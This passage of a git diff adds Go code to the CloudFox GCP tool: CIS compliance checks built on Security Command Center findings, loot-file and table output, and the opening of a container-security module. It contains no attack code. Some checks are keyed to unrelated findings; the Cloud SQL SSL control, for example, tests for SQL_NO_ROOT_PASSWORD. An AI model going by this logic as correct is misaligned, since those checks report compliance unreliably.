"CIS-GCP-2.0", + ControlName: "Ensure RSASHA1 is not used for zone-signing and key-signing", + Description: "RSASHA1 is considered weak for DNSSEC", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Use RSASHA256 or ECDSAP256SHA256 for DNSSEC", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_5_RDPAccess(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.5", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure RDP access is restricted from the Internet", + Description: "RDP (port 3389) should not be open to 0.0.0.0/0", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Restrict RDP access to specific IP ranges", + } + + if findings, ok := m.sccFindings["OPEN_RDP_PORT"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d firewall rules allowing RDP from internet", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "firewall-rule", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_6_SSHAccess(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.6", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure SSH access is restricted from the Internet", + Description: "SSH (port 22) should not be open to 0.0.0.0/0", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Restrict SSH access to specific IP ranges or use IAP", + } + + if findings, ok := m.sccFindings["OPEN_SSH_PORT"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d firewall rules allowing SSH from internet", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "firewall-rule", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_7_FlowLogs(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.7", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure VPC Flow Logs is enabled for every subnet", + Description: "VPC Flow Logs provide network traffic visibility", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable VPC Flow Logs on all subnets", + } + + if findings, ok := m.sccFindings["FLOW_LOGS_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_8_SSLPolicy(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.8", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure SSL policies use secure TLS versions", + Description: "SSL policies should require TLS 1.2 or higher", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Update SSL policies to require TLS 1.2+", + } + + if findings, ok := m.sccFindings["WEAK_SSL_POLICY"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_9_FirewallLogging(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.9", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure firewall rule logging is enabled", + Description: "Firewall rule logging provides audit trail for network access", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable logging on all firewall rules", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_10_VPCNetworkPeering(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.10", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure VPC network peering is properly configured", + Description: "Review VPC peering for appropriate trust relationships", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Review and document all VPC peering relationships", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 4: Virtual Machine Controls +func (m *ComplianceDashboardModule) checkCIS_4_1_DefaultServiceAccount(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure default Compute Engine service account is not used", + Description: "VMs should use custom service accounts with minimal permissions", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Create custom service accounts for compute instances", + } + + if findings, ok := m.sccFindings["DEFAULT_SERVICE_ACCOUNT"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d VMs using default service account", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "compute-instance", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_2_BlockProjectWideSSH(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure block project-wide SSH keys is enabled", + Description: "Block project-wide SSH keys to enforce instance-level access control", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable 'Block project-wide SSH keys' on all instances", + } + + if findings, ok := m.sccFindings["PROJECT_WIDE_SSH_KEYS_ALLOWED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_3_OSLogin(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure OS Login is enabled", + Description: "OS Login provides centralized SSH access management via IAM", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable OS Login at project or instance level", + } + + if findings, ok := m.sccFindings["OS_LOGIN_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_4_SerialPortDisabled(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.4", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure serial port access is disabled", + Description: "Serial port access should be disabled for security", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Disable serial port access on all instances", + } + + if findings, ok := m.sccFindings["SERIAL_PORT_ENABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_5_IPForwarding(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.5", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure IP forwarding is disabled unless required", + Description: "IP forwarding should only be enabled on NAT/gateway instances", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Disable IP forwarding on instances that don't require it", + } + + if findings, ok := m.sccFindings["IP_FORWARDING_ENABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_6_PublicIP(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.6", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure VMs do not have public IP addresses", + Description: "VMs should use private IPs and access internet via NAT", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Remove public IPs and use Cloud NAT for internet access", + } + + if findings, ok := m.sccFindings["PUBLIC_IP_ADDRESS"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d VMs with public IP addresses", len(findings)) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_7_ShieldedVM(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.7", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Shielded VM is enabled", + Description: "Shielded VMs provide verifiable integrity and boot security", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable Shielded VM features on all instances", + } + + if findings, ok := m.sccFindings["SHIELDED_VM_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_8_ComputeEncryption(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.8", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Compute Engine disks are encrypted with CMEK", + Description: "Use Customer-Managed Encryption Keys for disk encryption", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable CMEK encryption for all Compute Engine disks", + } + + if findings, ok := m.sccFindings["DISK_CSEK_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_9_ConfidentialComputing(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.9", + Framework: "CIS-GCP-2.0", + ControlName: "Consider enabling Confidential Computing for sensitive workloads", + Description: "Confidential VMs encrypt data in use", + Severity: "LOW", + Status: "MANUAL", + Remediation: "Evaluate Confidential Computing for sensitive workloads", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 5: Storage Controls +func (m *ComplianceDashboardModule) checkCIS_5_1_UniformBucketAccess(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-5.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure uniform bucket-level access is enabled", + Description: "Uniform bucket-level access simplifies and secures IAM permissions", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable uniform bucket-level access on all buckets", + } + + if findings, ok := m.sccFindings["BUCKET_IAM_NOT_MONITORED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_5_2_PublicBuckets(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-5.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud Storage buckets are not anonymously or publicly accessible", + Description: "Storage buckets should not allow public access", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Remove allUsers and allAuthenticatedUsers from bucket IAM", + } + + publicFindings := []string{} + for category, findings := range m.sccFindings { + if strings.Contains(strings.ToLower(category), "public_bucket") || + strings.Contains(strings.ToLower(category), "bucket_public") { + publicFindings = append(publicFindings, findings...) + } + } + + if len(publicFindings) > 0 { + control.Status = "FAIL" + control.FailCount = len(publicFindings) + control.Details = fmt.Sprintf("Found %d publicly accessible buckets", len(publicFindings)) + + for _, resource := range publicFindings { + m.addFailure(control, resource, "storage-bucket", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 6: Cloud SQL Controls +func (m *ComplianceDashboardModule) checkCIS_6_1_SQLPublicIP(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud SQL instances do not have public IPs", + Description: "Cloud SQL should use private IP only", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Configure Cloud SQL to use private IP only", + } + + if findings, ok := m.sccFindings["SQL_PUBLIC_IP"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d Cloud SQL instances with public IP", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "cloudsql-instance", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_6_2_SQLAuthorizedNetworks(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud SQL authorized networks do not include 0.0.0.0/0", + Description: "Restrict authorized networks to specific IP ranges", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Remove 0.0.0.0/0 from authorized networks", + } + + if findings, ok := m.sccFindings["SQL_WORLD_READABLE"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_6_3_SQLSSLRequired(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud SQL requires SSL connections", + Description: "SSL should be required for all database connections", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Enable 'Require SSL' for Cloud SQL instances", + } + + if findings, ok := m.sccFindings["SQL_NO_ROOT_PASSWORD"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_6_4_SQLNoPublicIP(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.4", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud SQL database instances are configured with automated backups", + Description: "Automated backups ensure data recovery capability", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable automated backups for Cloud SQL instances", + } + + if findings, ok := m.sccFindings["SQL_BACKUP_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_6_5_SQLBackups(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.5", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud SQL instances are using the latest major version", + Description: "Use latest major database version for security updates", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Upgrade Cloud SQL instances to latest major version", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_6_6_SQLContainedDB(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.6", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure contained database authentication is off for SQL Server", + Description: "Disable contained database authentication for SQL Server", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Set 'contained database authentication' flag to 'off'", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_6_7_SQLCrossDBAOwnership(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.7", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure cross db ownership chaining is off for SQL Server", + Description: "Disable cross db ownership chaining for SQL Server", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Set 'cross db ownership chaining' flag to 'off'", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 7: BigQuery Controls +func (m *ComplianceDashboardModule) checkCIS_7_1_BigQueryCMEK(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-7.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure BigQuery datasets are encrypted with CMEK", + Description: "Use Customer-Managed Encryption Keys for BigQuery", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable CMEK encryption for BigQuery datasets", + } + + if findings, ok := m.sccFindings["BIGQUERY_TABLE_CMEK_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_7_2_BigQueryTableCMEK(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-7.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure BigQuery tables are encrypted with CMEK", + Description: "Use Customer-Managed Encryption Keys for BigQuery tables", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable CMEK encryption for BigQuery tables", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_7_3_BigQueryDatasetPublic(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-7.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure BigQuery datasets are not publicly accessible", + Description: "BigQuery datasets should not allow allUsers or allAuthenticatedUsers", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Remove public access from BigQuery datasets", + } + + if findings, ok := m.sccFindings["BIGQUERY_TABLE_PUBLIC"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d publicly accessible BigQuery datasets", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "bigquery-dataset", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// ------------------------------ +// Framework Mapping +// ------------------------------ +func (m *ComplianceDashboardModule) mapToFrameworks() { + // Map CIS controls to other frameworks + for _, control := range m.Controls { + // Update CIS framework stats + if fw, ok := m.Frameworks["CIS-GCP-2.0"]; ok { + fw.TotalControls++ + switch control.Status { + case "PASS": + fw.PassedControls++ + case "FAIL": + fw.FailedControls++ + case "MANUAL": + fw.ManualControls++ + case "NOT_APPLICABLE": + fw.NAControls++ + } + } + } + + // Calculate scores for each framework + for _, fw := range m.Frameworks { + if fw.TotalControls > 0 { + assessed := fw.PassedControls + fw.FailedControls + if assessed > 0 { + fw.Score = float64(fw.PassedControls) / float64(assessed) * 100 + } + } + } +} + +// ------------------------------ +// Helper Functions +// ------------------------------ +func (m *ComplianceDashboardModule) addFailure(control ComplianceControl, resource, resourceType, projectID string) { + failure := ComplianceFailure{ + ControlID: control.ControlID, + Framework: control.Framework, + ControlName: control.ControlName, + Severity: control.Severity, + ResourceName: resource, + ResourceType: resourceType, + ProjectID: projectID, + Details: control.Details, + Remediation: control.Remediation, + RiskScore: m.calculateComplianceRiskScore(control.Severity), + } + + m.mu.Lock() + m.Failures = append(m.Failures, failure) + m.mu.Unlock() + + // Add to loot + m.addFailureToLoot(failure) +} + +func (m *ComplianceDashboardModule) calculateComplianceRiskScore(severity string) int { + switch severity { + case "CRITICAL": + return 100 + case "HIGH": + return 80 + case "MEDIUM": + return 50 + case "LOW": + return 25 + default: + return 10 + } +} + +func (m *ComplianceDashboardModule) getProjectFromResource(resource string) string { + // Extract project ID from resource name + // Format: projects/{project}/... + if strings.Contains(resource, "projects/") { + parts := strings.Split(resource, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return "" +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *ComplianceDashboardModule) initializeLootFiles() { + m.LootMap["compliance-critical-failures"] = &internal.LootFile{ + Name: "compliance-critical-failures", + Contents: "# Compliance Dashboard - Critical Failures\n# Generated by CloudFox\n# These require immediate remediation!\n\n", + } + m.LootMap["compliance-remediation-commands"] = &internal.LootFile{ + Name: "compliance-remediation-commands", + Contents: "# Compliance Dashboard - Remediation Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["compliance-by-framework"] = &internal.LootFile{ + Name: "compliance-by-framework", + Contents: "# Compliance Dashboard - Framework Summary\n# Generated by CloudFox\n\n", + } + m.LootMap["compliance-failed-controls"] = &internal.LootFile{ + Name: "compliance-failed-controls", + Contents: "# Compliance Dashboard - Failed Controls\n# Generated by CloudFox\n\n", + } +} + +func (m *ComplianceDashboardModule) addFailureToLoot(failure ComplianceFailure) { + m.mu.Lock() + defer m.mu.Unlock() + + // Critical failures + if failure.Severity == "CRITICAL" { + m.LootMap["compliance-critical-failures"].Contents += fmt.Sprintf( + "## %s - %s\n"+ + "Framework: %s\n"+ + "Resource: %s\n"+ + "Project: %s\n"+ + "Risk Score: %d\n"+ + "Remediation: %s\n\n", + failure.ControlID, + failure.ControlName, + failure.Framework, + failure.ResourceName, + failure.ProjectID, + failure.RiskScore, + failure.Remediation, + ) + } + + // Remediation commands + m.LootMap["compliance-remediation-commands"].Contents += fmt.Sprintf( + "# %s: %s\n"+ + "# Resource: %s\n"+ + "# %s\n\n", + failure.ControlID, + failure.ControlName, + failure.ResourceName, + failure.Remediation, + ) + + // Failed controls + m.LootMap["compliance-failed-controls"].Contents += fmt.Sprintf( + "%s (%s) - %s\n", + failure.ControlID, + failure.Severity, + failure.ResourceName, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *ComplianceDashboardModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Sort controls by severity, then control ID + sort.Slice(m.Controls, func(i, j int) bool { + if m.Controls[i].Status == "FAIL" && m.Controls[j].Status != "FAIL" { + return true + } + if m.Controls[i].Status != "FAIL" && m.Controls[j].Status == "FAIL" { + return false + } + severityOrder := map[string]int{"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3} + if severityOrder[m.Controls[i].Severity] != severityOrder[m.Controls[j].Severity] { + return severityOrder[m.Controls[i].Severity] < severityOrder[m.Controls[j].Severity] + } + return m.Controls[i].ControlID < m.Controls[j].ControlID + }) + + // Controls table + controlsHeader := []string{ + "Control ID", + "Control Name", + "Framework", + "Severity", + "Status", + "Details", + } + + var controlsBody [][]string + for _, c := range m.Controls { + details := c.Details + if details == "" { + details = "-" + } + controlsBody = append(controlsBody, []string{ + c.ControlID, + truncateString(c.ControlName, 50), + c.Framework, + c.Severity, + c.Status, + truncateString(details, 40), + }) + } + + // Failures table + failuresHeader := []string{ + "Control ID", + "Severity", + "Resource", + "Type", + "Project", + "Risk Score", + } + + var failuresBody [][]string + for _, f := range m.Failures { + failuresBody = append(failuresBody, []string{ + f.ControlID, + f.Severity, + truncateString(f.ResourceName, 50), + f.ResourceType, + f.ProjectID, + fmt.Sprintf("%d", f.RiskScore), + }) + } + + // Framework summary table + frameworkHeader := []string{ + "Framework", + "Version", + "Total", + "Passed", + "Failed", + "Manual", + "Score (%)", + } + + var frameworkBody [][]string + for _, fw := range m.Frameworks { + if fw.TotalControls > 0 { + frameworkBody = append(frameworkBody, []string{ + fw.Name, + fw.Version, + fmt.Sprintf("%d", fw.TotalControls), + fmt.Sprintf("%d", fw.PassedControls), + fmt.Sprintf("%d", fw.FailedControls), + fmt.Sprintf("%d", fw.ManualControls), + fmt.Sprintf("%.1f", fw.Score), + }) + } + } + + // Add framework summary to loot + for _, fw := range m.Frameworks { + if fw.TotalControls > 0 { + m.LootMap["compliance-by-framework"].Contents += fmt.Sprintf( + "## %s v%s\n"+ + "Total Controls: %d\n"+ + "Passed: %d\n"+ + "Failed: %d\n"+ + "Manual Review: %d\n"+ + "Compliance Score: %.1f%%\n\n", + fw.Name, + fw.Version, + fw.TotalControls, + fw.PassedControls, + fw.FailedControls, + fw.ManualControls, + fw.Score, + ) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "compliance-controls", + Header: controlsHeader, + Body: controlsBody, + }, + } + + // Add failures table if any + if len(failuresBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "compliance-failures", + Header: failuresHeader, + Body: failuresBody, + }) + } + + // Add framework summary table + if len(frameworkBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "compliance-summary", + Header: frameworkHeader, + Body: frameworkBody, + }) + } + + output := ComplianceDashboardOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/containersecurity.go b/gcp/commands/containersecurity.go new file mode 100644 index 00000000..0f13080d --- /dev/null +++ b/gcp/commands/containersecurity.go @@ -0,0 +1,813 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + "google.golang.org/api/run/v1" +) + +// Module name constant +const GCP_CONTAINERSECURITY_MODULE_NAME string = "container-security" + +var GCPContainerSecurityCommand = &cobra.Command{ + Use: GCP_CONTAINERSECURITY_MODULE_NAME, + Aliases: []string{"containers", "container", "cloudrun-security"}, + Short: "Analyze container configurations for security issues", + Long: `Analyze Cloud Run and container configurations for security vulnerabilities. + +Features: +- Detects secrets in environment variables +- Analyzes container security context +- Identifies public/unauthenticated services +- Checks for privileged configurations +- Reviews ingress and network settings +- Identifies vulnerable base images (where possible) +- Analyzes service account permissions + +Security Checks: +- Secrets/credentials in env vars (API keys, passwords, tokens) +- Public ingress without authentication +- Over-permissioned service accounts +- Missing security headers +- Insecure container configurations + +Requires appropriate IAM permissions: +- roles/run.viewer +- roles/container.viewer`, + Run: runGCPContainerSecurityCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type ContainerConfig struct { + Name string + ProjectID string + Location string + ServiceType string // cloudrun, gke-pod + Image string + ServiceAccount string + Ingress string + Authentication string + EnvVarCount int + SecretEnvVars int + VPCConnector string + MinInstances int64 + MaxInstances int64 + CPU string + Memory string + Concurrency int64 + Timeout string + CreatedTime string + RiskLevel string +} + +type EnvVarSecret struct { + ServiceName string + ProjectID string + Location string + EnvVarName string + SecretType string // password, api-key, token, credential, connection-string + RiskLevel string + Details string + Remediation string +} + +type ContainerSecurityIssue struct { + ServiceName string + ProjectID string + Location string + IssueType string + Severity string + Description string + Remediation string + AffectedArea string +} + +type PublicService struct { + Name string + ProjectID string + Location string + URL string + Authentication string + Ingress string + RiskLevel string + Details string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type ContainerSecurityModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + Containers []ContainerConfig + EnvVarSecrets []EnvVarSecret + SecurityIssues []ContainerSecurityIssue + PublicServices []PublicService + LootMap map[string]*internal.LootFile + mu sync.Mutex + + // Tracking + totalServices int + publicCount int + secretsFound int + issuesFound int +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type ContainerSecurityOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ContainerSecurityOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ContainerSecurityOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPContainerSecurityCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_CONTAINERSECURITY_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &ContainerSecurityModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Containers: []ContainerConfig{}, + EnvVarSecrets: []EnvVarSecret{}, + SecurityIssues: []ContainerSecurityIssue{}, + PublicServices: []PublicService{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *ContainerSecurityModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Analyzing container security configurations...", GCP_CONTAINERSECURITY_MODULE_NAME) + + // Create Cloud Run client + runService, err := run.NewService(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Cloud Run service: %v", err), GCP_CONTAINERSECURITY_MODULE_NAME) + return + } + + // Process each project + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProject(ctx, project, runService, logger) + }(projectID) + } + wg.Wait() + + // Check results + if m.totalServices == 0 { + logger.InfoM("No container services found", GCP_CONTAINERSECURITY_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Analyzed %d container service(s)", m.totalServices), GCP_CONTAINERSECURITY_MODULE_NAME) + + 